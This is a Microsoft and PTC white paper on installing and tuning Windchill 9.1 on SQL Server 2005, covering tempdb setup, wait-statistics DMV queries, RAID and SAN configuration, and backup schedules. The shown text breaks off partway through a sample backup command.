Complying with all applicable copyright laws is the responsibility of the user. Without limiting the rights under copyright, no part of this document may be reproduced, stored in, or introduced into a retrieval system, or transmitted in any form or by any means (electronic, mechanical, photocopying, recording, or otherwise), or for any purpose, without the express written permission of Microsoft Corporation. Microsoft may have patents, patent applications, trademarks, copyrights, or other intellectual property rights covering subject matter in this document. Except as expressly provided in any written license agreement from Microsoft, the furnishing of this document does not give you any license to these patents, trademarks, copyrights, or other intellectual property. © 2010 Microsoft Corporation. All rights reserved. Microsoft, SQL Server, Hyper-V, MSDN, and Windows are trademarks of the Microsoft group of companies. All other trademarks are property of their respective owners. # Table of Contents **OVERVIEW** ......................................................................................................................... 5 - **INTRODUCING PTC WINDCHILL: A COMPLETE SOLUTION FOR PLM** .......................................................... 5 - **SQL SERVER: AN ENTERPRISE-READY DATABASE PLATFORM FOR WINDCHILL** ........................................ 6 - **PTC AND MICROSOFT: A HISTORY OF INNOVATION** ...................................................................................... 6 - **BETTER TOGETHER: WINDCHILL ON THE SQL SERVER DATABASE PLATFORM** ........................................... 6 **BEST PRACTICES FOR INSTALLING WINDCHILL ON SQL SERVER** ......................................................... 7 - **SELECT, SIZE, AND CONFIGURE SQL SERVER FOR OPTIMAL PERFORMANCE** ........................................ 
7 - **Hardware Selection** .......................................................................................................................... 8 - **Configuring Tempdb** ..................................................................................................................... 9 - **Instant File Initialization** ................................................................................................................ 12 - **Using Tempdb in Memory** .............................................................................................................. 12 - **MEMORY AND CPU** ......................................................................................................................... 13 - **ADDITIONAL PERFORMANCE ANALYSIS WITH DMVs** ........................................................................... 15 - **LOCKED PAGES** ............................................................................................................................... 16 - **LOCK ESCALATION** .......................................................................................................................... 16 **DATABASE FILES** ...................................................................................................................... 16 - **RAID DRIVE ARRAYS** ...................................................................................................................... 17 - **SAN DRIVES** ................................................................................................................................... 17 - **RECOVERY MODEL** .......................................................................................................................... 18 - **Cost of Recovering Instead of Using Hot-Swapped Mirror Drives** .................................................... 
18 - **DISK DRIVE SUBSYSTEMS** ............................................................................................................. 18 - **WINDCHILL LOGICAL FILES** .......................................................................................................... 19 **INDEX TUNING** ............................................................................................................................... 21 - **WHAT IS A FILL FACTOR?** ............................................................................................................... 21 - **EVALUATING INDEX FRAGMENTATION** ............................................................................................ 23 - **TYPES OF INDEXES** ......................................................................................................................... 25 - **MISSING INDEXES** ............................................................................................................................ 25 - **TOOLS TO HELP MAINTAIN SQL SERVER PERFORMANCE** .............................................................. 26 - **CAPACITY PLANNING AND MONITORING** .................................................................................... 26 - **Common DBCC Commands** ........................................................................................................ 27 - **COMMON MISTAKES** ...................................................................................................................... 28 **CONCLUSION** ............................................................................................................................... 28 **LINKS FOR FURTHER INFORMATION** ............................................................................................ 29 - **BIBLIOGRAPHY** .............................................................................................................................. 
31 **APPENDIX: HARDWARE SIZING GUIDE FOR WINDCHILL 9.1 AND SQL SERVER 2005** ......................... 32 FIGURES Figure 1 - Example of a 4-core Tempdb Configuration ............................................................ 11 Figure 2 - Example of Possible I/O Bottleneck on the Log File ......................................................... 15 Figure 3 - Windchill Database Files Dialog Box Showing Autogrowth .............................................. 21 Figure 4 - Rate of Growth Over Time with Constant Rate of New Records ........................................... 22 Figure 5 - Example of Retrieving Index Fragmentation Statistics ....................................................... 24 Figure 6 - Reviewing DBCC USEROPTIONS .............................................................................. 28 TABLES Table 1 - Assigning Components by Disk Performance ........................................................................ 9 Table 2 - Recommended Values for Tempdb Database Options .......................................................... 11 Table 3 - Performance Monitor Indicators of Inadequate Resources .................................................... 14 Table 4 - RAID Types ....................................................................................................................... 17 Table 5 - SAN Setting ........................................................................................................................ 17 Table 6 - Frequency of Backups by Installation Size ............................................................................. 18 Table 7 - Ranked Performance of Different Disk Drive Subsystems .................................................... 19 Table 8 - Windchill Logical Files ........................................................................................................ 
20 Table 9 - Example of Logical Drive Assignments ............................................................................. 21 Table 10 - Calculating Fill Factor from Historical Data ...................................................................... 22 Table 11 - Fill Factors by Index Key Size for 2% Growth .................................................................. 25 Table A - Database Server Sizing for Windchill 9.0 and 9.1 .............................................................. 33 Table B - Number of Physical Files in the Tempdb Filegroup ............................................................... 34 Overview For manufacturers, there is constant pressure today to compete in rapidly changing markets. Companies must be innovative in keeping costs low while maintaining high-quality results. The stakeholders involved in the product development process have also changed. Teams today extend far beyond the central engineering department to include globally dispersed cross-functional groups working on hundreds of products with thousands of parts. The result is an enormous amount of data. To stay ahead of the global competition, companies find that they must create a collaborative environment that brings together engineering, manufacturing, marketing, and sales teams. Product Lifecycle Management (PLM) solutions can help manufacturers achieve this collaboration, while also streamlining operations and keeping costs down. PLM is the process of managing all phases of product development—from initial concept through end of life. Effective PLM combines information, methodology, and available resources for each phase of a product’s lifecycle, improving a manufacturer’s ability to respond swiftly and effectively to changes, new markets, and competitors. 
Introducing PTC Windchill: A Complete Solution for PLM PTC Windchill provides a complete family of solutions for content and process management, helping manufacturers efficiently control all information assets related to product development while optimizing associated business processes. Windchill is the only PLM solution designed from the ground up to work in an Internet-based, distributed-design environment. Windchill technology forms a solid foundation for a variety of packages that PTC offers to address data, change, configuration, and process management; product development collaboration; project management and execution; and the release of product information to manufacturing management systems. For example, - **Windchill PDMLink** consolidates scattered islands of product content into a single information source, which can help bring order to chaotic product development processes such as change management and speed the development of new product configurations. - **Windchill ProjectLink** creates a virtual workspace that becomes the central access point for a project, enabling team members to collaborate with access to the same information. By automating project management activities, Windchill ProjectLink helps customers better manage all of their programs, project schedules, information, and processes. As an integral component of PTC’s Product Development System (PDS), Windchill manages all product content and business processes throughout a product’s lifecycle. Windchill connects seamlessly to Pro/ENGINEER for three-dimensional (3-D) computer-aided design (CAD) models, ProductView® for advanced mock-up and interactive visualization, Mathcad® for engineering calculations, and Arbortext® for dynamic publishing. SQL Server: An Enterprise-Ready Database Platform for Windchill Microsoft SQL Server provides an ideal database platform for Windchill. 
SQL Server is a high-performance, integrated database and business intelligence (BI) solution for data management and analysis. This easy-to-implement, easy-to-support foundation provides a multifunctional solution for large-scale online transaction processing (OLTP), data warehousing, and e-commerce applications and a solution for data integration, analysis, and reporting. SQL Server can help companies manage large volumes of mission-critical data and run software applications—such as PTC Windchill—to optimize their business performance. SQL Server can extract and transform data from a variety of sources, including XML data files, flat files, and relational data sources, and then load it into one or more destinations. In addition to rapid data mining, analysis, processing, and reporting capabilities, SQL Server has built-in features that give you a secure, reliable, and productive data management environment that truly protects your data. With its scalable infrastructure, SQL Server has the capability to grow with your business and keep up with your toughest data challenges. PTC and Microsoft: A History of Innovation PTC and Microsoft deliver complementary product development solutions that organizations can use broadly across their infrastructure. With a Microsoft IT infrastructure, you get an open, extensible platform and a simplified user experience. You can take advantage of your existing IT investments for a lower total cost of ownership (TCO). PTC provides full integration with your Microsoft infrastructure, including Microsoft® Office SharePoint® Server, Microsoft® Office Project Server, Microsoft® Office Communications Server, Windows Server®, and SQL Server. The PDS architecture gives you end-to-end solutions for product development and a single source for product and process knowledge. Together, PTC and Microsoft deliver powerful product development solutions that provide tremendous customer value. 
Better Together: Windchill on the SQL Server Database Platform Running Windchill on SQL Server delivers measurable value by channeling data into manageable, automated processes. This decreases administrative time, improves productivity, reduces costs, and generates greater employee satisfaction. Benchmarking tests confirm that SQL Server scales to meet the performance needs of even the largest enterprise customers, while providing lower initial costs and licensing fees.¹ Benchmark test results showed that Pro/ENGINEER and Windchill 9.1 performed up to 50 percent faster on SQL Server 2005 than on a competitor’s database, with an average performance advantage of approximately 10 percent. These results confirm SQL Server 2005 as a superior database choice for Windchill 9.1. Best Practices for Installing Windchill on SQL Server Best practices define the most efficient use of computing resources to produce the best system performance and most reliable delivery and availability of data. Because many factors can contribute to poor system performance, you should aim to implement best practices in both planning and operating your Windchill system. The Windchill application database needs periodic maintenance and tuning. Without such maintenance, database operations can become considerably slower over time. Implementing best practices helps ensure that your SQL Server database is: - Configured for administrative monitoring - Free of database corruption and system errors - Available when users need it - Tuned for optimal performance, letting users receive the data they request in a reasonable period - Able to return to normal operation quickly after a failure Best practices for Windchill on the SQL Server database platform encompass both hardware and software. They include sizing, setting up, validating, maintaining, monitoring, and backing up your system. 
The guidance provided in this paper can get you started on items not covered in the following PTC documents: “Windchill on Microsoft SQL Server Installation Planning Guide®: Enterprise Deployment Resource, Windchill® 9.0 & Windchill® 9.1” and “Windchill® and Pro/INTRALINK® 9.0 and 9.1 Server Hardware Sizing Guidelines – Microsoft Windows Platform.” PTC and Microsoft provide a great deal of valuable guidance for keeping your Windchill management system running smoothly. For more detailed information, see the Links for Further Information at the end of the paper. Trouble-free performance is impossible to guarantee. However, if you find that you need to make a service call, ensure that you have first run through the recommended monitoring guidance in the sections that follow. These best practices will provide you with valuable information that you can use to get your system back up and running quickly. Select, Size, and Configure SQL Server for Optimal Performance PTC requires SQL Server 2005 Standard or Enterprise Edition for Windchill 9.1. In most cases², the recommended configuration is SQL Server 2005 Service Pack 3 (SP3) running on x64 hardware. Larger sites may require Windows 2008 R2 Data Center Edition with SQL Server 2005 Enterprise Edition to support more than eight (8) x64 sockets. The SQL Server 2005 Features Comparison page provides more information, and SQL Server Books Online’s Editions and Components of SQL Server 2005 gives you additional guidance on choosing appropriate SQL Server editions and features for your implementation. ² Running AWE with SQL Server 2005 x86 on an x64 system is not recommended. SQL Server will consume all of the memory except 128MB, which can impact performance. AWE can use only 16GB of memory. This document walks you through the key steps in setting up SQL Server 2005 for Windchill 9.1. Note: Windchill 10.0 will run on SQL Server 2008; Windchill 9.1 requires SQL Server 2005. 
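Before sizing hardware, it is worth confirming the installed edition, version, and service pack level of an existing instance. The following T-SQL is an illustrative check (not part of PTC's official installation steps) using the standard SERVERPROPERTY function:

```sql
-- Confirm edition, version, and service pack level before installing
-- Windchill 9.1 (SQL Server 2005 SP3 is the recommended baseline).
SELECT SERVERPROPERTY('Edition')        AS edition,          -- e.g. Enterprise Edition (64-bit)
       SERVERPROPERTY('ProductVersion') AS product_version,
       SERVERPROPERTY('ProductLevel')   AS product_level;    -- e.g. 'SP3'
```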
Hardware Selection The sizing tables in the Appendix augment the guidance in "Windchill® and Pro/INTRALINK® 9.0 and 9.1 Server Hardware Sizing Guidelines – Microsoft Windows Platform" by showing the suggested initial number of cores, sockets, and operating system (OS) options for running Windchill on SQL Server. Except for the smallest installations (four CPUs or fewer), you will need to run SQL Server Enterprise Edition using x64 CPUs. This paper focuses on this type of configuration. If you are purchasing hardware, you may want to ensure that the hardware will support more cores and more memory than stated in the sizing table. It is considerably more expensive and difficult to replace the hardware later. Many firms deem additional memory and CPUs for existing hardware to be expenses, while replacement machines may be capital investments. CPUs Look for CPUs and disk drives with larger caches: CPUs with at least 16MB of L3 cache, and disk drives with at least a 16MB read buffer. Avoid IA64 CPUs because Microsoft is discontinuing support for them. Do not count a hyper-threading core as two cores. Intel's paper "How to Determine the Effectiveness of Hyper-Threading Technology with an Application" indicates that the actual gain from hyper-threading is only 15%-30% more than a single core. Memory The system memory should be the fastest available (DDR3-1600 or better). The motherboard, memory, and CPUs must be compatible. Physical Hard Drives Obtain the best-performing drives that you can afford. Performance is typically a function of rotations per minute (RPM) and cache size, but interface cards and drivers also play a role. The performance of a RAID array is often more dependent on the RAID card than on the hard drives. If not all of the drives are identical, evaluate each hard drive's performance using SQLIO before allocating them to logical drives. 
(For details, see the comprehensive companion white paper "Best Drive Configuration Practices for PTC Windchill on Microsoft SQL Server," available on the Microsoft and PTC Alliance Web page.) Before evaluating drive performance, reformat all of the hard drives used for data storage. If you are using Windows Server 2003, make sure you align disk partitions: Windows Server 2008 aligns disk partitions automatically, but Windows Server 2003 does not. Incorrect alignment can cut performance by up to 30%. If you have physical drives with different performance characteristics, you should assign them to different components as suggested in Table 1. Table 1 - Assigning Components by Disk Performance <table> <thead> <tr> <th>Random I/O Drive Performance</th> <th>Use for</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>Best</td> <td>Tempdb</td> <td>This is where most performance-critical activities occur.</td> </tr> <tr> <td>Medium</td> <td>Random access tables</td> <td>This type of activity requires frequent movement across the disk.</td> </tr> <tr> <td>Worst</td> <td>Log files, log tables</td> <td>This type of component serializes writes to the disk into a continuous stream. The serial write performance should not be less than the random write performance of the database being logged.</td> </tr> </tbody> </table> A Storage Area Network (SAN) is often the preferred storage medium because it is the easiest scale-out solution. A SAN Logical Unit Number (LUN) is equivalent to a RAID unit and behaves like a logical drive. SAN units should be on isolated networks supporting at least 1GB transfer speeds. Here are PTC's recommendations for hard drives: - Do not use software to emulate RAID; always use hardware. - Do not use SATA drives; use SCSI drives. - Use RAID 1+0 when possible; otherwise, use RAID 1, RAID 5, or RAID 6. - Use more small drives instead of fewer large drives. 
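Once components have been assigned to drives as in Table 1, the actual placement can be audited from within SQL Server. The query below is a suggested sketch, not taken from the PTC guides; it lists every database file with its drive letter so you can verify that data files, log files, and tempdb land on the intended drives:

```sql
-- List each database file with its drive letter and size so placement
-- can be compared against the component-to-drive assignments above.
SELECT DB_NAME(database_id)   AS database_name,
       name                   AS logical_name,
       type_desc,             -- ROWS (data) or LOG
       LEFT(physical_name, 3) AS drive,    -- e.g. 'E:\'
       size * 8 / 1024        AS size_mb   -- size is stored in 8KB pages
FROM sys.master_files
ORDER BY drive, database_name;
```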
Two small 7200 RPM drives striped may deliver better performance than one 15000-RPM drive and at substantially less cost. In addition to the "Best Drive Configuration Practices" paper, see Storage Top 10 Best Practices and Mike Ruthruff's Predeployment I/O Best Practices for more details. Configuring Tempdb The SQL Server tempdb system database provides temporary storage space for many things, from temporary tables to DBCC CHECKDB worktables. Tempdb configuration greatly influences Windchill performance. SQL Server will use tempdb for various activities if there is insufficient memory on your system, and this shifting of activity to tempdb results in a significant loss of performance. A poorly configured tempdb compounds the performance loss. For all disk drives, PTC recommends the following: - The drives should be RAID (1 or 1+0, but not RAID 5). - With RAID 1, SQL Server will not shut down if one of the drives fails. - The drives should be the fastest (typically 15000 RPM) and provide the highest throughput that you can afford. - Drives should have write caching turned off. - Verify that the disks' partitions are aligned properly. - The Windows swap file should not be located on any of the above drives, nor on the OS drive. - Do not change the Windchill database owner from system administrator (sa). - Create alerts using SQL Server Agent to track for errors 1101 or 1105, which indicate that you are running out of space on at least one drive. - Error 1101: Could not allocate a new page for database because of insufficient disk space in filegroup. - Error 1105: Could not allocate space for object. For tempdb configuration, PTC recommends the following: - Tempdb should not be located on: - The OS drive - Any drive that also contains the database files - Tempdb should be located on at least one dedicated logical drive. - Tempdb should be striped across as many drives as practical. - Locate the tempdb log on a dedicated logical drive. 
There is rarely benefit to spreading the transaction log across multiple drives. - Create one tempdb data file per core for the tempdb filegroup. - All of the files in the tempdb filegroup should be the same size. - Use striped drives to increase throughput. - If distributing the files across different physical drives, the drive speeds should be the same. - See Table B in the Appendix for more details. - Use Table B in the Appendix to determine the number of tempdb files that should be in each filegroup. - Enable autogrowth and set it to 10% to protect system performance if your environment does not conform to the capacity tables. - Once you have populated the database with the expected volume of data, monitor tempdb while rebuilding the indexes of the table that has the most rows. - Tempdb should always be on drives with available space being at least 20% of the database size. A larger tempdb may be required depending on the ad hoc queries that are executed against the database. A bad query might result in significant growth. Adding an additional large index may result in index rebuilds failing due to a lack of space in tempdb. Running out of space in tempdb may stop Windchill and reduce SQL Server to limited functions. - Caution: Turning on Snapshot Isolation to match Oracle's default transaction behavior requires appropriate sizing adjustments to tempdb. It may significantly increase the demands on tempdb and, with the wrong hardware configuration, decrease performance. - If you are using a SAN, tempdb should have its own dedicated drives and its own LUN. --- 7 [http://support.microsoft.com/kb/234656](http://support.microsoft.com/kb/234656) Figure 1 shows a sample 4-core tempdb configuration following these best practices. **Figure 1 - Example of a 4-core Tempdb Configuration** Table 2 shows the database options available for tempdb and PTC's recommended values for them to ensure the best performance with Windchill. 
**Table 2 - Recommended Values for Tempdb Database Options** <table> <thead> <tr> <th>Database Option</th> <th>Default Value</th> <th>Recommended Value</th> </tr> </thead> <tbody> <tr> <td>AUTO_CREATE_STATISTICS</td> <td>ON</td> <td>ON</td> </tr> <tr> <td>AUTO_UPDATE_STATISTICS</td> <td>ON</td> <td>ON</td> </tr> <tr> <td>AUTO_UPDATE_STATISTICS_ASYNC</td> <td>OFF</td> <td>ON</td> </tr> <tr> <td>CHANGE_TRACKING</td> <td>OFF</td> <td>OFF</td> </tr> </tbody> </table> Make sure you also follow these recommendations for additional SQL Server options affecting tempdb: - SORT_IN_TEMPDB should be ON. - CHECKSUM should be ON. SQL Server drops tempdb and recreates it every time SQL Server stops and is restarted. It is important to note the size of tempdb before stopping the server and then use ALTER DATABASE to set the initial size of tempdb to this size if it is greater than the current setting. Doing this reduces the number of times that autogrowth occurs, improving performance and reducing disk fragmentation. PTC also recommends instant file initialization of tempdb, which we will cover in a moment. In addition, as part of regular weekly maintenance, you should: - Check the SQL Server error log for the following error numbers: 1101, 1105, 3959, 3958, and 3966. Alternatively, set up a SQL Server Agent alert to email a notification when these errors occur. If you see any of these errors, you should troubleshoot for a sizing issue.² - Check the size of tempdb versus its startup setting. Increase the startup setting if it is less than the size observed. - Record the maximum size of tempdb you see for periodic review. **Instant File Initialization** The default behavior for tempdb is to recreate itself when SQL Server starts with a small database size and grow as needed. During this growth process, SQL Server initializes the file by filling the space with zeros. Specifying a larger initial file size and doing instant file initialization will improve performance. 
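The tempdb sizing recommendations above can be sketched in T-SQL. The file names, path, and 4096MB size below are illustrative assumptions only; substitute the largest tempdb size observed in your own production workload:

```sql
-- Set tempdb's primary data file to the largest size observed in
-- production so autogrowth rarely fires after a restart.
ALTER DATABASE tempdb
MODIFY FILE (NAME = tempdev, SIZE = 4096MB, FILEGROWTH = 10%);

-- Add one equally sized data file per CPU core (repeat for each core).
ALTER DATABASE tempdb
ADD FILE (NAME = tempdev2,
          FILENAME = 'T:\tempdb2.ndf',  -- assumed dedicated tempdb drive
          SIZE = 4096MB, FILEGROWTH = 10%);
```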
The initial size should be at least the largest size seen in production. See the SQL Server Premier Field Engineer blog post “How and Why to Enable Instant File Initialization” for more information.

**Using Tempdb in Memory**

SQL Server versions prior to 2005 allowed tempdb to be explicitly placed in memory for better performance. SQL Server 2005 requires the creation of a RAM disk to place tempdb in memory (see Microsoft SQL Server I/O subsystem requirements for the tempdb database). The other option to obtain equivalent performance is to use a DRAM-based solid-state drive.

Putting tempdb on a RAM drive should never be an initial configuration. When your application is fully populated and in regular production, verify the condition below to determine if there is adequate RAM:

\[ \text{Total Physical Memory} - (1.2 \times \text{Maximum tempdb Size Observed}) > (1.2 \times \text{Maximum Memory Used}) \]

This formula includes a 20% buffer to allow for future growth. If you do not have sufficient physical memory to fulfill the above condition, you may have lower throughput if you place tempdb in memory.

For more information about drive configurations, see “Best Drive Configuration Practices for PTC Windchill on Microsoft SQL Server” and “TEMPDB Capacity Planning and Concurrency Considerations for Index Create and Rebuild.”

**Memory and CPU**

The sizing guidance provided in “Windchill and Pro/INTRALINK 9.0 and 9.1 Server Hardware Sizing Guidelines – Microsoft Windows Platform” may not apply to your installation because of a difference in usage pattern. You can confirm whether your configuration for memory and CPU is adequate by using Windows Performance Monitor. To get the information you need, configure and run Performance Monitor as follows:

- Set the polling frequency to 30 seconds or more.
- Do not run it on the machine hosting SQL Server.
- Log the data to a physical file.
- Consider running it as a service or at a scheduled time for consistent data collection.
- The monitoring period should be the weekly peak load; typically, this occurs on Thursday afternoons.
- Retain a 24-hour baseline of the busiest day to use for future reference.

After every major software patch or hardware change, rerun Performance Monitor and compare the results to determine the positive or negative impact that the change made. During peak load periods, run Performance Monitor and review the indicators shown in Table 3.

**Table 3 - Performance Monitor Indicators of Inadequate Resources**

<table>
<thead>
<tr>
<th>Object</th>
<th>Counter</th>
<th>Description</th>
<th>Recommended Action</th>
</tr>
</thead>
<tbody>
<tr>
<td>Logical Disk</td>
<td>% Free Space</td>
<td>Applies to each logical drive</td>
<td>&lt; 15%: More disk space needed</td>
</tr>
<tr>
<td></td>
<td>Avg. Disk sec/Read</td>
<td>Applies to each logical drive</td>
<td>&gt; 15 ms: I/O or disk bottleneck</td>
</tr>
<tr>
<td>Memory</td>
<td>Cache Bytes</td>
<td></td>
<td>&gt; 300MB: Disk bottleneck; consider better controllers or faster disks</td>
</tr>
<tr>
<td></td>
<td>% Committed Bytes in Use</td>
<td></td>
<td>&gt; 80%: Add more memory</td>
</tr>
<tr>
<td></td>
<td>Available Mbytes</td>
<td></td>
<td>&lt; 5% of total RAM: Add more memory</td>
</tr>
<tr>
<td>Network Interface</td>
<td>Output Queue Length</td>
<td></td>
<td>&gt; 2: Faster network card or segment the network</td>
</tr>
<tr>
<td>SQL Server: Buffer Manager</td>
<td>Buffer Cache Hit Ratio</td>
<td>Ratio of reads found cached in memory</td>
<td>&lt; 95%: Add more memory</td>
</tr>
<tr>
<td></td>
<td>Page Life Expectancy</td>
<td>Seconds a page remains in the buffer cache</td>
<td>&lt; 300 or sudden drops: Add more memory</td>
</tr>
<tr>
<td>SQL Server: General Statistics</td>
<td>User Connections</td>
<td></td>
<td>If at 255 (system default) or the current configured maximum, increase the setting</td>
</tr>
<tr>
<td>SQL Server: SQL Statistics</td>
<td>Batch Requests/Sec</td>
<td></td>
<td>If 0.9 &gt; (Batch Requests - SQL Compilations) / Batch Requests: CPU bottleneck</td>
</tr>
<tr>
<td></td>
<td>SQL Compilations/Sec</td>
<td></td>
<td>&lt; 90%: CPU bottleneck</td>
</tr>
</tbody>
</table>

**Additional Performance Analysis with DMVs**

In addition to Performance Monitor, you can use SQL Server’s dynamic management views (DMVs) to analyze your system’s performance. SQL Server tracks wait information in DMVs, and you can execute the following queries against them to detect additional problems:\(^{17}\)

- To detect a CPU bottleneck:

```sql
SELECT wait_type
FROM sys.dm_os_wait_stats
WHERE wait_time_ms > 0
  AND signal_wait_time_ms / wait_time_ms > .25
```

- To see if CPU throughput is being lost to parallelism:

```sql
SELECT wait_type
FROM sys.dm_os_wait_stats
WHERE wait_type = 'CXPACKET'
  AND wait_time_ms > 0
  AND signal_wait_time_ms / wait_time_ms > .10
```

- To investigate a possible blocking bottleneck:

```sql
SELECT *, wait_time_ms / (waiting_tasks_count + 1) AS Avg
FROM sys.dm_os_wait_stats
WHERE wait_type LIKE 'LCK_%'
  AND waiting_tasks_count > 0
  AND max_wait_time_ms > 2 * wait_time_ms / (waiting_tasks_count + 1)
```

- To detect an I/O bottleneck:

```sql
SELECT *
FROM (SELECT TOP 20 *
      FROM sys.dm_os_wait_stats
      ORDER BY max_wait_time_ms DESC) TopItems
WHERE wait_type IN ('ASYNCH_IO_COMPLETION', 'IO_COMPLETION',
                    'LOGMGR', 'WRITELOG')
   OR wait_type LIKE 'PAGEIOLATCH_%'
```

(Also see Figure 2 for an example of a possible problem with the log file; a 0.39-second delay was seen for writing to the log, which could slow the entire database.)

Execute these queries at the end of the business day so that you let the data accumulate beginning from when SQL Server was started.
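Beyond the per-wait-type queries above, one aggregate check against the same DMV is the share of total wait time that is signal wait. This sketch is not taken from this paper; the commonly cited reading is that values above roughly 25% indicate CPU pressure:

```sql
-- Percentage of all wait time spent waiting for a CPU (signal waits).
SELECT CAST(100.0 * SUM(signal_wait_time_ms) / SUM(wait_time_ms)
            AS DECIMAL(5,2)) AS signal_wait_pct
FROM sys.dm_os_wait_stats
WHERE wait_time_ms > 0;
```

Like the queries above, this is most meaningful when the statistics have accumulated over a full business day.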
When you want to observe the statistics for a specific period, you can reset the counters using the following command:

```
DBCC SQLPERF ('sys.dm_os_wait_stats', CLEAR);
```

**Figure 2 - Example of Possible I/O Bottleneck on the Log File**

<table>
<thead>
<tr>
<th>wait_type</th>
<th>waiting_tasks_count</th>
<th>wait_time_ms</th>
<th>max_wait_time_ms</th>
<th>signal_wait_time_ms</th>
</tr>
</thead>
<tbody>
<tr>
<td>WRITELOG</td>
<td>2853</td>
<td>6281</td>
<td>390</td>
<td>125</td>
</tr>
<tr>
<td>PAGEIOLATCH_SH</td>
<td>638</td>
<td>1375</td>
<td>140</td>
<td>15</td>
</tr>
<tr>
<td>IO_COMPLETION</td>
<td>874</td>
<td>1171</td>
<td>140</td>
<td>15</td>
</tr>
<tr>
<td>PAGEIOLATCH_EX</td>
<td>361</td>
<td>359</td>
<td>46</td>
<td>0</td>
</tr>
<tr>
<td>PAGEIOLATCH_UP</td>
<td>32</td>
<td>15</td>
<td>15</td>
<td>0</td>
</tr>
</tbody>
</table>

**Locked Pages**

Starting with SQL Server 2005 SP3, Standard Edition supports Locked Pages in memory, which gives similar advantages to running SQL Server 2005 x86 with AWE. This option may improve performance if you have adequate memory. For instructions on enabling this option, see the article “Support for Locked Pages on SQL Server 2005 Standard Edition 64-bit systems and on SQL Server 2008 Standard Edition 64-bit systems.”

**Lock Escalation**

Lock escalation rarely occurs with Windchill, but it may occur with some usage patterns. If you observe blocking conditions, start a SQL Server Profiler trace that includes the Lock:Escalation event. If you see this event, read the related Microsoft support article about how to resolve the problem.

**Database Files**

Running PTC Windchill on SQL Server provides a firm foundation for your mission-critical PLM activities. Windchill supports essential product engineers who cannot do their work if SQL Server is not available. Thus, it is critical that contingency planning be at the forefront of your installation planning.
At a minimum, it is strongly recommended that hard drives containing database files be redundant (mirrored or parity) on hot-swappable drives. If one drive fails, there is no loss of data, nor is there a need to bring SQL Server down to replace the drive. Hardware failures happen, and there are two common paths for recovery:

- **Via a RAID array with hot-pluggable drives:** The database will not be offline.
  1. Replace the failed drive promptly.
  2. Rebuild the failed drive dynamically from the other drives.
- **Via the Full recovery model:** If drives are not redundant (mirrored or parity), you must use the SQL Server Full recovery model. The database will be offline until recovered, which may be hours or days depending on the size of the database and the number of backups you need to restore.
  1. Replace the failed drive.
  2. Restore the last full database backup.
  3. Restore the subsequent differential database backups in sequence.
  4. Restore the transaction log backups in sequence since the last differential database backup.
  5. Restore the current transaction log.

**RAID Drive Arrays**

There are two important concepts involved with RAID drives:

- **Performance** - achieved via striping
- **Redundancy** - achieved by mirroring or parity

Table 4 contains a summary of common RAID types and their features. (See “Best Drive Configuration Practices for PTC Windchill on Microsoft SQL Server” for further information.)
**Table 4 - Common RAID Types and Features**

<table>
<thead>
<tr>
<th>RAID Type</th>
<th>Features</th>
<th>Drive Ratio</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>0</td>
<td>Striped</td>
<td>1:1</td>
<td>Faster speed, no redundancy</td>
</tr>
<tr>
<td>1</td>
<td>Mirror</td>
<td>1:2+</td>
<td>Redundant drives; data not lost if a drive fails</td>
</tr>
<tr>
<td>3 and 4</td>
<td>Striped Parity</td>
<td>1:3+</td>
<td>Poor performance; redundant drives; better storage efficiency than RAID 1</td>
</tr>
<tr>
<td>5</td>
<td>Striped Parity</td>
<td>1:3+</td>
<td>Can tolerate the loss of 1 drive</td>
</tr>
<tr>
<td>6</td>
<td>Striped Dual Parity</td>
<td>1:4+</td>
<td>Can tolerate the loss of 2 drives</td>
</tr>
<tr>
<td>10 or 1+0</td>
<td>Mirror Striped</td>
<td>1:4+</td>
<td>First mirrored, then striped</td>
</tr>
<tr>
<td>01 or 0+1</td>
<td>Striped Mirror</td>
<td>1:4</td>
<td>Same as above except the sequence is reversed</td>
</tr>
</tbody>
</table>

**Note:** A logical drive (M:) that is RAID 1+0 will consist of at least four (4) physical drives. For most of this document, a drive means a logical drive. Be alert for multiple logical drives partitioned from one physical drive; this may result in loss of both performance and redundancy.

**SAN Drives**

If you are using SAN drives for your database files, some special settings affect performance. In particular, the default Host Bus Adapter queue depth is too low; use the recommendation shown in Table 5. SQLIO provides guidance on the optimal settings for your hardware. For more information, see Mike Ruthruff’s SQL Server Predeployment I/O Best Practices article.
**Table 5 - Recommended HBA Queue Depth**

<table>
<thead>
<tr>
<th>Setting</th>
<th>Default Value</th>
<th>Recommended Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>Host Bus Adapter (HBA) Queue Depth</td>
<td>8-32</td>
<td>64 (varies by hardware(^{19}))</td>
</tr>
</tbody>
</table>

**Recovery Model**

PTC recommends using the SQL Server Full recovery model for Windchill because the cost of losing data is significant, both in terms of recreating the data and in terms of identifying what was lost. This model requires regular transaction log backups, as follows:

- **Transaction logs and backups should never be on a hard disk that contains any Windchill database file; if that drive goes bad, recovery is impossible.**
- If the transaction log drive fails (and is not mirrored), then you must immediately:
  - Stop SQL Server
  - Do a full backup
  - Replace the drive
  - Start SQL Server
- You should schedule automatic backups as shown in Table 6.

**Table 6 - Recommended Backup Schedule**

<table>
<thead>
<tr>
<th>Action</th>
<th>Small Installation</th>
<th>Medium Installation</th>
<th>Large Installation</th>
</tr>
</thead>
<tbody>
<tr>
<td>Full Backup</td>
<td>Weekly</td>
<td>Daily</td>
<td>Daily</td>
</tr>
<tr>
<td>Differential Backup</td>
<td>Daily</td>
<td>Every 4 working hours</td>
<td>Every hour</td>
</tr>
<tr>
<td>Transaction Log Backup</td>
<td>Every 4 working hours</td>
<td>Every hour</td>
<td>Every 15 minutes</td>
</tr>
</tbody>
</table>

Other recovery models are not appropriate for a variety of reasons; for example, neither the Bulk-logged recovery model nor the Simple recovery model fully logs binary large object (BLOB) operations.

**Cost of Recovering Instead of Using Hot-Swapped Mirror Drives**

The Windchill database can be very large, and a full recovery from backups and transaction logs may take many hours or days. The economic cost of lost productivity can become significant. You should view database recovery as a secondary insurance policy, with the primary insurance provided by redundant hot-swappable drives.
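The backup schedule recommended in this section would normally be implemented as SQL Server Agent jobs. The following is a minimal sketch of the three statement types involved; the backup path `E:\Backups\...` is an assumption for illustration, and in production each backup set would be named uniquely rather than overwritten with INIT:

```sql
-- Weekly or daily full backup:
BACKUP DATABASE wcAdmin TO DISK = N'E:\Backups\wcAdmin_full.bak'
    WITH CHECKSUM, INIT;

-- Differential backup between full backups:
BACKUP DATABASE wcAdmin TO DISK = N'E:\Backups\wcAdmin_diff.bak'
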